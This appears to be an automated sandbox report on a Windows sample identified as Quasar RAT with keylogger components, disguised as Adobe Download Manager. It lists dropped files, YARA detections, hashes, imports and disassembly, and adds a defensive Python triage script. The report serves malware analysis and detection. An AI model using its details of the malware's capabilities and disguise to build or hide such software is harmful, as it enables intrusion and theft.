                                        • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 93%
                                        Reputation:unknown
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......\.................h............... ........@.. ....................................@.................................p...K.................................................................................... ............... ..H............text....g... ...h.................. ..`.rsrc................j..............@..@.reloc...............r..............@..B........................H.......(...H...............H.............................................{....*"..}....*.....{....*"..}....*...n.(......(.......(....(....*..(.......(....(.......(....(....*...0...........t......-..*.(.....o....o....*...0..L..................(....-8......(....-$.....(....o.............o.....(....&.(....&.*.0...............o.....*.0...................(....o............o.....t.....r...p..r...p..~....o........,...(.....t........,...o...../.s....z......&r...p.......,..(....&....
                                        C:\Users\user\btpanui\SystemPropertiesPerformance.exe
                                        Process:C:\Users\user\Desktop\CVbJSUXraQ.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):2111272
                                        Entropy (8bit):6.7152149759316115
                                        Encrypted:false
                                        SSDEEP:24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYc:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9YC
                                        MD5:9423821A023FB02427783F6385871B3B
                                        SHA1:1F75D4DC2E3665B6025DCEF7E0D9A51D96C608A4
                                        SHA-256:CEFA469207046F1BA256D52D6685B40376A06159926AB3D20925FB413B487098
                                        SHA-512:52D3791DDA128D28B1CF803E2A4B8F355B223587550A02A178F5D7FB339B196CABE847AB49EBE2E70CDFDEA41FBF62752E71E1920182BBCA7C5BA5B9F3CFF2BB
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth
                                        • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth
                                        • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Reputation:unknown
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...d..\.........."..........N.......}............@........................... ...........@...@.......@.....................L...|....p...............0 ...... ..q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q... ..r..................@..B........................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.715211023726544
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.72%
                                        • Win32 Executable (generic) a (10002005/4) 49.68%
                                        • Windows ActiveX control (116523/4) 0.58%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:CVbJSUXraQ.exe
                                        File size:2111264
                                        MD5:b0b78da613422be0de8de2e2a2d0ce68
                                        SHA1:a1aea30e16b3bbf15baf1fbb78499adcc5e11d97
                                        SHA256:efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0
                                        SHA512:6448d7a633aceae8c20fd077e5d4a83f5a542f4b229f0299440bd1b9d90772c83e5a9ca831fed1cf34e75fe08ade8cd386d651d50d1dfee1e102df496252ea57
                                        SSDEEP:24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYQ:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yu
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                        File Icon

                                        Icon Hash:c4c4c4c8ccd4d0c4

                                        Static PE Info

                                        General

                                        Entrypoint:0x427dcd
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                        Time Stamp:0x5C87B664 [Tue Mar 12 13:38:44 2019 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:afcdf79be1557326c854b6e20cb900a7

                                        Entrypoint Preview

                                        Instruction
                                        call 00007F9848DC6C7Ah
                                        jmp 00007F9848DB9A44h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push edi
                                        push esi
                                        mov esi, dword ptr [esp+10h]
                                        mov ecx, dword ptr [esp+14h]
                                        mov edi, dword ptr [esp+0Ch]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007F9848DB9BCAh
                                        cmp edi, eax
                                        jc 00007F9848DB9F2Eh
                                        bt dword ptr [004C31FCh], 01h
                                        jnc 00007F9848DB9BC9h
                                        rep movsb
                                        jmp 00007F9848DB9EDCh
                                        cmp ecx, 00000080h
                                        jc 00007F9848DB9D94h
                                        mov eax, edi
                                        xor eax, esi
                                        test eax, 0000000Fh
                                        jne 00007F9848DB9BD0h
                                        bt dword ptr [004BE324h], 01h
                                        jc 00007F9848DBA0A0h
                                        bt dword ptr [004C31FCh], 00000000h
                                        jnc 00007F9848DB9D6Dh
                                        test edi, 00000003h
                                        jne 00007F9848DB9D7Eh
                                        test esi, 00000003h
                                        jne 00007F9848DB9D5Dh
                                        bt edi, 02h
                                        jnc 00007F9848DB9BCFh
                                        mov eax, dword ptr [esi]
                                        sub ecx, 04h
                                        lea esi, dword ptr [esi+04h]
                                        mov dword ptr [edi], eax
                                        lea edi, dword ptr [edi+04h]
                                        bt edi, 03h
                                        jnc 00007F9848DB9BD3h
                                        movq xmm1, qword ptr [esi]
                                        sub ecx, 08h
                                        lea esi, dword ptr [esi+08h]
                                        movq qword ptr [edi], xmm1
                                        lea edi, dword ptr [edi+08h]
                                        test esi, 00000007h
                                        je 00007F9848DB9C25h
                                        bt esi, 03h
                                        jnc 00007F9848DB9C78h

                                        Rich Headers

                                        Programming Language:
                                        • [ASM] VS2013 UPD4 build 31101
                                        • [ C ] VS2013 build 21005
                                        • [ C ] VS2008 SP1 build 30729
                                        • [LNK] VS2013 UPD4 build 31101
                                        • [C++] VS2013 build 21005
                                        • [ASM] VS2013 build 21005
                                        • [RES] VS2013 build 21005
                                        • [IMP] VS2008 SP1 build 30729

                                        Data Directories

                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x13a7f8 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x203000 | 0x0 | .reloc
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x202000 | 0x711c | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x1000 | 0x8dcc4 | 0x8de00 | False | 0.572867910242 | data | 6.67611805852 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata | 0x8f000 | 0x2e10e | 0x2e200 | False | 0.335355267615 | data | 5.76010872795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data | 0xbe000 | 0x8f74 | 0x5200 | False | 0.10175304878 | data | 1.1987458977 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0xc7000 | 0x13a7f8 | 0x13a800 | False | 0.481297042677 | data | 6.62212260461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0x202000 | 0x711c | 0x7200 | False | 0.765076754386 | data | 6.77903165045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        Name | RVA | Size | Type | Language | Country
                                        RT_ICON | 0xc77b4 | 0x468 | GLS_BINARY_LSB_FIRST | English | Great Britain
                                        RT_ICON | 0xc7c1c | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
                                        RT_ICON | 0xc7d44 | 0x668 | data | English | Great Britain
                                        RT_ICON | 0xc83ac | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4294965391, next used block 7403512 | English | Great Britain
                                        RT_ICON | 0xc8694 | 0x1e8 | data | English | Great Britain
                                        RT_ICON | 0xc887c | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
                                        RT_ICON | 0xc89a4 | 0x35e0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain
                                        RT_ICON | 0xcbf84 | 0xea8 | data | English | Great Britain
                                        RT_ICON | 0xcce2c | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | Great Britain
                                        RT_ICON | 0xcd6d4 | 0x6c8 | data | English | Great Britain
                                        RT_ICON | 0xcdd9c | 0x568 | GLS_BINARY_LSB_FIRST | English | Great Britain
                                        RT_ICON | 0xce304 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | Great Britain
                                        RT_ICON | 0xdeb2c | 0x94a8 | data | English | Great Britain
                                        RT_ICON | 0xe7fd4 | 0x67e8 | data | English | Great Britain
                                        RT_ICON | 0xee7bc | 0x5488 | data | English | Great Britain
                                        RT_ICON | 0xf3c44 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432 | English | Great Britain
                                        RT_ICON | 0xf7e6c | 0x25a8 | data | English | Great Britain
                                        RT_ICON | 0xfa414 | 0x10a8 | data | English | Great Britain
                                        RT_STRING | 0xfb4bc | 0x594 | data | English | Great Britain
                                        RT_STRING | 0xfba50 | 0x68a | data | English | Great Britain
                                        RT_STRING | 0xfc0dc | 0x490 | data | English | Great Britain
                                        RT_STRING | 0xfc56c | 0x5fc | data | English | Great Britain
                                        RT_STRING | 0xfcb68 | 0x65c | data | English | Great Britain
                                        RT_STRING | 0xfd1c4 | 0x466 | data | English | Great Britain
                                        RT_STRING | 0xfd62c | 0x158 | data | English | Great Britain
                                        RT_FONT | 0xfd784 | 0x1c211 | ASCII text, with very long lines, with no line terminators | |
                                        RT_FONT | 0x119998 | 0x1c211 | ASCII text, with very long lines, with no line terminators | |
                                        RT_RCDATA | 0x135bac | 0x65600 | PE32 executable (GUI) Intel 80386, for MS Windows | |
                                        RT_RCDATA | 0x19b1ac | 0x57400 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | |
                                        RT_RCDATA | 0x1f25ac | 0xea26 | data | |
                                        RT_GROUP_ICON | 0x200fd4 | 0x102 | data | English | Great Britain
                                        RT_GROUP_ICON | 0x2010d8 | 0x14 | data | English | Great Britain
                                        RT_VERSION | 0x2010ec | 0x31c | data | |
                                        RT_MANIFEST | 0x201408 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain

                                        Imports

                                        DLL | Import
                                        WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                        VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                        WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                        COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                        MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                        WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                        PSAPI.DLL | GetProcessMemoryInfo
                                        IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                        USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                        UxTheme.dll | IsThemeActive
                                        KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                        USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                        GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                        COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                                        ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                        SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                        ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                        OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                        Version Infos

Description | Data
LegalCopyright | Copyright 2018 Adobe Incorporated. All rights reserved.
FileVersion | ...
CompanyName | Adobe Systems Incorporated
ProductName | Adobe Download Manager
ProductVersion | ...
FileDescription | Adobe Download Manager
OriginalFilename | Adobe Download Manager
Translation | 0x0409 0x04b0

                                        Possible Origin

Language of compilation system | Country where language is spoken
English | Great Britain
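The version resource above makes claims (an Adobe product, a copyright line, an OriginalFilename) that a triage script can sanity-check mechanically instead of by eye. The Python below is an added example, not code from the report or from the sample: it applies a handful of heuristic rules to the string table shown above, all of which the table trips, and checks a byte buffer for the marker that compiled AutoIt v3 executables carry (the ASCII tag "AU3!EA06" and its 16-byte preamble, assumed from public AutoIt YARA signatures, since the report states only the AutoIt verdict and not the bytes). REPORT_VERSION_INFO is copied from the table; FileVersion and ProductVersion are left out because the report truncates them. The on-disk file name and the PE-like buffer used in the usage section are constructed placeholders.

```python
"""Heuristic triage of a PE version resource plus the compiled-AutoIt marker.

Added example, not code from the report or from the sample. REPORT_VERSION_INFO is
copied from the Version Infos table; the sample file name and the byte buffer used
below are constructed placeholders.
"""
import os
import re
from typing import Dict, List, Optional

# Marker that compiled AutoIt v3 executables place in front of the embedded script:
# a 16-byte preamble followed by the ASCII tag "AU3!EA06". Assumed from public
# AutoIt YARA signatures; the report only gives the AutoIt verdict, not the bytes.
AUTOIT_EA06_PREFIX = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")
AUTOIT_EA06_TAG = b"AU3!EA06"

# Copied from the report's table. FileVersion/ProductVersion are omitted because the
# report truncates them; the rules treat a missing key as an empty value.
REPORT_VERSION_INFO: Dict[str, str] = {
    "LegalCopyright": "Copyright 2018 Adobe Incorporated. All rights reserved.",
    "CompanyName": "Adobe Systems Incorporated",
    "ProductName": "Adobe Download Manager",
    "FileDescription": "Adobe Download Manager",
    "OriginalFilename": "Adobe Download Manager",
}

_VERSION_RE = re.compile(r"\d+([.,]\d+){1,3}")


def _stem(name: str) -> str:
    """Lower-cased file name without directory or extension ('C:\\x\\Foo.EXE' -> 'foo')."""
    base = re.split(r"[\\/]", name)[-1]
    return os.path.splitext(base)[0].lower()


def version_info_red_flags(info: Dict[str, str], sample_name: Optional[str] = None) -> List[str]:
    """Return the names of the heuristic rules that fire for a StringFileInfo table.

    No single rule proves malice; normally built software usually passes all of them.
    """
    def get(key: str) -> str:
        return (info.get(key) or "").strip()

    flags: List[str] = []

    # 1. A genuine build's copyright line names the same company as CompanyName.
    company, legal = get("CompanyName"), get("LegalCopyright")
    if company and legal and company.lower() not in legal.lower():
        flags.append("company-not-named-in-copyright")

    # 2. OriginalFilename is meant to hold a file name (foo.exe), not a product title.
    original = get("OriginalFilename")
    if original and not os.path.splitext(original)[1]:
        flags.append("originalfilename-has-no-extension")

    # 3. Renamed binary: the name it was built with differs from the name on disk.
    if original and sample_name and _stem(original) != _stem(sample_name):
        flags.append("originalfilename-differs-from-sample-name")

    # 4. Normal build tooling fills in numeric versions; spoofed resources often do not.
    for key in ("FileVersion", "ProductVersion"):
        if not _VERSION_RE.fullmatch(get(key)):
            flags.append(f"{key.lower()}-missing-or-malformed")

    # 5. One string pasted into every descriptive field.
    trio = {get("ProductName"), get("FileDescription"), get("OriginalFilename")}
    if len(trio) == 1 and get("ProductName"):
        flags.append("productname-filedescription-originalfilename-identical")

    return flags


def looks_like_compiled_autoit(data: bytes) -> bool:
    """True if the buffer contains the compiled-AutoIt script marker (tag or preamble)."""
    return AUTOIT_EA06_TAG in data or AUTOIT_EA06_PREFIX in data


if __name__ == "__main__":
    # Constructed inputs: a placeholder on-disk name and a fake PE-like buffer.
    print(version_info_red_flags(REPORT_VERSION_INFO, "submitted_sample.exe"))
    fake_pe = b"MZ" + b"\x00" * 62 + AUTOIT_EA06_PREFIX + AUTOIT_EA06_TAG + b"\x00" * 16
    print(looks_like_compiled_autoit(fake_pe))
```

On a real file, read the string table with any PE parser and pass the resulting dict plus the submitted file name; the marker check works on the raw file bytes, so it also fires when the AutoIt payload sits in an overlay rather than a resource.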

                                        Static AutoIT Info

General

Reading note for the decompiled listing below: it opens with the constants from AutoIt's standard include files (AutoItConstants.au3 and the related *Constants.au3 files) and continues with the Array.au3 UDF functions (_ArrayAdd, _ArrayBinarySearch, _ArrayColDelete, _ArrayColInsert, _ArrayCombinations, _ArrayConcatenate, _ArrayDelete, _ArrayDisplay). This is library code compiled into any script that includes those files, so it says nothing about the sample's own behaviour; the script's own logic follows it. Two decompiler artefacts to keep in mind: negative literals are printed as unsigned 32-bit values with a leading plus sign, so "+ 4294967295" is -1 (as in RETURN SETERROR (1 , 0 , -1 )) and "+ 4294967294" is -2; and the ternary operator "a ? b : c" is printed as three adjacent parenthesised terms, e.g. "((BITAND ($IFLAGS , 32 ) ) (0 ) (...))" reads "BitAND($iFlags, 32) ? 0 : ...".

